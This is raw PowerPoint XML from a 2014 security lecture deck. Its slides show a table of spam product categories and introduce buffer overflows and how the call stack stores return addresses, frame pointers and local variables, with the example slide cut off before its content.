            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="155745" y="2286000"/>
            <a:ext cx="8912055" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="5181600"/>
            <a:ext cx="1206500" cy="541295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1000906854"/>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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE541A8-D53F-3F4B-99AF-9027B68691FD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="567751611"/>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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356354" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356355" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>doesn’t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>verify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>amount of data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> it receives, it runs the risk of over-writing the memory zone containing variables, code or jump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>addresses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Knowing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>well the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>machine’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>architecture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the an attacker can inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>machine code that will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;50% of security incidents reported at CERT are related to buffer overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156820865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Most common products advertised</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47804791"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304800" y="2209800"/>
          <a:ext cx="2971800" cy="2966720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2199132"/>
                <a:gridCol w="772668"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Pharmacy</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>81%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="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Replica</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5.40%</a:t>
                      </a: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Enhancers</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>2.30%</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Phishing</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>2.30%</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Degrees</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>1.30%</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Casino</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>1.00%</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Weight Loss</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>0.40%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Other</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>6.30%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="5486400"/>
            <a:ext cx="3356884" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Commtouch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Software Ltd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>., 2010</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>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657600" y="2133600"/>
            <a:ext cx="5486400" cy="4233333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Date Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C270C27E-8536-9149-9DA9-3AFF6BC96CEE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4272038164"/>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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358402" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reminder: The Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358403" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The stack allows temporary storage of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We pop data in the reverse order than when we pushed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>them</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>During a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>function call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the return address is pushed onto the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We also push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the arguments to the function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1944351080"/>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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360450" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reminder: The Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360451" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>function’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>local variables are also pushed onto the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A corresponding zone (the frame) is allocated on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A frame pointer indicates where the current frame starts on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>During a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>function call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the previous value of the frame pointer is pushed onto the stack before being replaced by its new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>value</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="840997966"/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376834" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[Wikipedia]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376836" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="3657600" cy="3657600"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
